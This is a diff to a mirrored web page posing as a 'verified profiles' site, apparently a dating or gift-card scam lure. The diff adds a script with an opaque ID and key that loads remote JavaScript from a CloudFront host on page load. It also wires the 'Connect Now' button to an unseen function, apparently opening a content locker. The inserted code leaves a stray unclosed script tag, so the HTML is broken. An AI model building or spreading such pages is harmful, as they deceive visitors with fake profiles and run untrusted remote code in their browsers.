--- a/mohua/index.html
+++ b/mohua/index.html
@@ -3,6 +3,12 @@
   
 <!-- Mirrored from gift-card.eonw.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Sep 2024 12:18:01 GMT -->
 <head>
+<script type="text/javascript">
+    var idSli_AWj_YQScwc={"it":4437264,"key":"160cc"};
+</script>
+<script src="https://d2v7l2267atlz5.cloudfront.net/47da6a4.js"></script>
+
+	<script>
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>🎉 Connect with Verified Profiles</title>
@@ -31,7 +37,8 @@
           <div class="box-content">
             <h3>Afsana Rahman</h3>
             <p class="cards-remaining">🕒 Active User: 20 years old – Last active 5 mins ago</p>
-            <button class="gene-btn">➡️ [Connect Now]</button>
+ <button class="gene-btn" onclick="_om()">➡️ [Connect Now]</button>
+            
           </div>
         </div>
         <div class="box">
